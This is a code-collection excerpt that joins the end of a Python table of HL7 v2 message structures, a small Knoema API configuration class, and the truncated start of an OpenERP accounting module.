('REF_I12_PROCEDURE', GROUPS['REF_I12_PROCEDURE'], (0, -1), 'GRP'),
('REF_I12_OBSERVATION', GROUPS['REF_I12_OBSERVATION'], (0, -1), 'GRP'),
('REF_I12_PATIENT_VISIT', GROUPS['REF_I12_PATIENT_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RER_RER': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RER_RER_DEFINITION', GROUPS['RER_RER_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RGR_RGR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RGR_RGR_DEFINITION', GROUPS['RGR_RGR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RGV_O15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RGV_O15_PATIENT', GROUPS['RGV_O15_PATIENT'], (0, 1), 'GRP'),
('RGV_O15_ORDER', GROUPS['RGV_O15_ORDER'], (1, -1), 'GRP'),)),
'ROR_ROR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ROR_ROR_DEFINITION', GROUPS['ROR_ROR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RPA_I08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RPA_I08_AUTHORIZATION_1', GROUPS['RPA_I08_AUTHORIZATION_1'], (0, 1), 'GRP'),
('RPA_I08_PROVIDER', GROUPS['RPA_I08_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('RPA_I08_INSURANCE', GROUPS['RPA_I08_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RPA_I08_PROCEDURE', GROUPS['RPA_I08_PROCEDURE'], (1, -1), 'GRP'),
('RPA_I08_OBSERVATION', GROUPS['RPA_I08_OBSERVATION'], (0, -1), 'GRP'),
('RPA_I08_VISIT', GROUPS['RPA_I08_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPI_I01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPI_I01_PROVIDER', GROUPS['RPI_I01_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RPI_I01_GUARANTOR_INSURANCE', GROUPS['RPI_I01_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPI_I04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPI_I04_PROVIDER', GROUPS['RPI_I04_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RPI_I04_GUARANTOR_INSURANCE', GROUPS['RPI_I04_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RPL_I02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPL_I02_PROVIDER', GROUPS['RPL_I02_PROVIDER'], (1, -1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RPR_I03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('RPR_I03_PROVIDER', GROUPS['RPR_I03_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQA_I08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RQA_I08_AUTHORIZATION', GROUPS['RQA_I08_AUTHORIZATION'], (0, 1), 'GRP'),
('RQA_I08_PROVIDER', GROUPS['RQA_I08_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RQA_I08_GUARANTOR_INSURANCE', GROUPS['RQA_I08_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RQA_I08_PROCEDURE', GROUPS['RQA_I08_PROCEDURE'], (0, -1), 'GRP'),
('RQA_I08_OBSERVATION', GROUPS['RQA_I08_OBSERVATION'], (0, -1), 'GRP'),
('RQA_I08_VISIT', GROUPS['RQA_I08_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQC_I05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RQC_I05_PROVIDER', GROUPS['RQC_I05_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQI_I01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RQI_I01_PROVIDER', GROUPS['RQI_I01_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('RQI_I01_GUARANTOR_INSURANCE', GROUPS['RQI_I01_GUARANTOR_INSURANCE'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQP_I04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RQP_I04_PROVIDER', GROUPS['RQP_I04_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RQQ_Q09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ERQ', SEGMENTS['ERQ'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RRA_O18': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRA_O18_RESPONSE', GROUPS['RRA_O18_RESPONSE'], (0, 1), 'GRP'),)),
'RRD_O14': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRD_O14_RESPONSE', GROUPS['RRD_O14_RESPONSE'], (0, 1), 'GRP'),)),
'RRE_O12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRE_O12_RESPONSE', GROUPS['RRE_O12_RESPONSE'], (0, 1), 'GRP'),)),
'RRG_O16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RRG_O16_RESPONSE', GROUPS['RRG_O16_RESPONSE'], (0, 1), 'GRP'),)),
'RRI_I12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (0, 1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('RRI_I12_AUTHORIZATION_CONTACT', GROUPS['RRI_I12_AUTHORIZATION_CONTACT'], (0, 1), 'GRP'),
('RRI_I12_PROVIDER_CONTACT', GROUPS['RRI_I12_PROVIDER_CONTACT'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RRI_I12_PROCEDURE', GROUPS['RRI_I12_PROCEDURE'], (0, -1), 'GRP'),
('RRI_I12_OBSERVATION', GROUPS['RRI_I12_OBSERVATION'], (0, -1), 'GRP'),
('RRI_I12_PATIENT_VISIT', GROUPS['RRI_I12_PATIENT_VISIT'], (0, 1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RSP_K11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K11_ROW_DEFINITION', GROUPS['RSP_K11_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K21_QUERY_RESPONSE', GROUPS['RSP_K21_QUERY_RESPONSE'], (0, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_K23_QUERY_RESPONSE', GROUPS['RSP_K23_QUERY_RESPONSE'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_K25_STAFF', GROUPS['RSP_K25_STAFF'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_K31': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_K31_RESPONSE', GROUPS['RSP_K31_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Q11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_Q11_QUERY_RESULT_CLUSTER', GROUPS['RSP_Q11_QUERY_RESULT_CLUSTER'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z82': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z82_QUERY_RESPONSE', GROUPS['RSP_Z82_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z86': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RSP_Z86_QUERY_RESPONSE', GROUPS['RSP_Z86_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RSP_Z88': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z88_QUERY_RESPONSE', GROUPS['RSP_Z88_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (1, 1), 'SEG'),)),
'RSP_Z90': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('RSP_Z90_QUERY_RESPONSE', GROUPS['RSP_Z90_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (1, 1), 'SEG'),)),
'RTB_K13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RTB_K13_ROW_DEFINITION', GROUPS['RTB_K13_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RTB_Knn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RTB_Z74': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RTB_Z74_ROW_DEFINITION', GROUPS['RTB_Z74_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SIU_S12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SCH', SEGMENTS['SCH'], (1, 1), 'SEG'),
('TQ1', SEGMENTS['TQ1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('SIU_S12_PATIENT', GROUPS['SIU_S12_PATIENT'], (0, -1), 'GRP'),
('SIU_S12_RESOURCES', GROUPS['SIU_S12_RESOURCES'], (1, -1), 'GRP'),)),
'SPQ_Q08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('SPR', SEGMENTS['SPR'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SQM_S25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('SQM_S25_REQUEST', GROUPS['SQM_S25_REQUEST'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SQR_S25': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('SQR_S25_SCHEDULE', GROUPS['SQR_S25_SCHEDULE'], (0, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'SRM_S01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('ARQ', SEGMENTS['ARQ'], (1, 1), 'SEG'),
('APR', SEGMENTS['APR'], (0, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('SRM_S01_PATIENT', GROUPS['SRM_S01_PATIENT'], (0, -1), 'GRP'),
('SRM_S01_RESOURCES', GROUPS['SRM_S01_RESOURCES'], (1, -1), 'GRP'),)),
'SRR_S01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SRR_S01_SCHEDULE', GROUPS['SRR_S01_SCHEDULE'], (0, 1), 'GRP'),)),
'SSR_U04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('SSR_U04_SPECIMEN_CONTAINER', GROUPS['SSR_U04_SPECIMEN_CONTAINER'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'SSU_U03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('SSU_U03_SPECIMEN_CONTAINER', GROUPS['SSU_U03_SPECIMEN_CONTAINER'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'SUR_P09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SUR_P09_FACILITY', GROUPS['SUR_P09_FACILITY'], (1, -1), 'GRP'),)),
'TBR_R08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (1, 1), 'SEG'),
('RDT', SEGMENTS['RDT'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'TCU_U10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EQU', SEGMENTS['EQU'], (1, 1), 'SEG'),
('TCU_U10_TEST_CONFIGURATION', GROUPS['TCU_U10_TEST_CONFIGURATION'], (1, -1), 'GRP'),
('ROL', SEGMENTS['ROL'], (0, 1), 'SEG'),)),
'UDM_Q05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('URD', SEGMENTS['URD'], (1, 1), 'SEG'),
('URS', SEGMENTS['URS'], (0, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (1, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'VQQ_Q07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('VTQ', SEGMENTS['VTQ'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'VXQ_V01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'VXR_V03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('VXR_V03_PATIENT_VISIT', GROUPS['VXR_V03_PATIENT_VISIT'], (0, 1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('VXR_V03_INSURANCE', GROUPS['VXR_V03_INSURANCE'], (0, -1), 'GRP'),
('VXR_V03_ORDER', GROUPS['VXR_V03_ORDER'], (0, -1), 'GRP'),)),
'VXU_V04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('VXU_V04_PATIENT', GROUPS['VXU_V04_PATIENT'], (0, 1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('VXU_V04_INSURANCE', GROUPS['VXU_V04_INSURANCE'], (0, -1), 'GRP'),
('VXU_V04_ORDER', GROUPS['VXU_V04_ORDER'], (0, -1), 'GRP'),)),
'VXX_V02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('VXX_V02_PATIENT', GROUPS['VXX_V02_PATIENT'], (1, -1), 'GRP'),)),
}
|
Knoema/knoema-python-driver
|
refs/heads/master
|
knoema/api_config.py
|
1
|
"""This module contains Api configuration class"""
import os
class ApiConfig(object):
"""
This class configures knoema api.
The class contains fields:
host -- the host where kneoma is going to connect
app_id -- application id that will have access to knoema.
Application should be created by knoema user or administrator
app_secret -- code that can be done after application will be created.
Should be set up together with app_id
"""
def __new__(cls):
if not hasattr(cls, 'instance'):
cls.instance = super(ApiConfig, cls).__new__(cls)
cls.instance.host = os.environ['KNOEMA_HOST'] if 'KNOEMA_HOST' in os.environ else 'knoema.com'
cls.instance.app_id = None
cls.instance.app_secret = None
return cls.instance
def __init__(self):
self.host = self.instance.host
self.app_id = self.instance.app_id
self.app_secret = self.instance.app_secret
|
danielharbor/openerp
|
refs/heads/master
|
addons/account_payment/account_move_line.py
|
73
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class account_move_line(osv.osv):
_inherit = "account.move.line"
def line2bank(self, cr, uid, ids, payment_type=None, context=None):
"""
Try to return for each Ledger Posting line a corresponding bank
account according to the payment type. This work using one of
the bank of the partner defined on the invoice eventually
associated to the line.
